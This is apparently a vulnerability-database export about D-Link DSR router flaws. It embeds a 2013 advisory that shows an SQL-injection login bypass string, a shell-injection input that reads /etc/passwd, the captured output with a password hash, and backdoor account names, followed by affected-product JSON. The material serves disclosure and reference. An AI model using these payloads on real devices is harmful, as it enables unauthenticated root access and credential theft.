        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "id": "VAR-202012-0333",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:16:41.808000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "title": "Patch for D-Link DSR-250 command injection vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/242233"
      },
      {
        "title": "D-link DSR-250 Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=137680"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25759"
      },
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "date": "2020-12-15T20:15:16.307000",
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "date": "2021-08-27T07:31:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "date": "2021-07-21T11:39:23.747000",
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DSR-250\u00a0 Input verification vulnerability in device",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ],
    "trust": 0.6
  }
}

VAR-201312-0198

Vulnerability from variot - Updated: 2023-12-18 12:08

The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targetted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

  1. Contents:

  2. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  3. Exposure: D-Link backdoor user
  4. Vulnerability: Use of weak hash algorithms
  5. Exposure: Passwords are stored as plain text in config files
  6. Vulnerability: Bad permissions on /etc/shadow

  7. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  8. Possible via the global webUI login form.

  9. File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end

  • This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

  • Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin password = ' or 'a'='a

  • ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

  • Old school SQL injection. Ohh, by the way...

  • The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

  • File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. Tools like curl are not hindered by these checks.

  • All forms allow input like this:

localhost;

example:

localhost;cat /etc/passwd

  • This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.

  • Output from user provided commands gets displayed on the next page beneath the benign command output.

example:

[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh </textarea> [...] 3. Exposure: D-Link backdoor user: * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW: root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one. * I verified this by showing the /etc/profile: # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' 4. Vulnerability: Use of weak hash algorithms: * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet. * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password. 5. Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< [RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>

Show details on source website

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
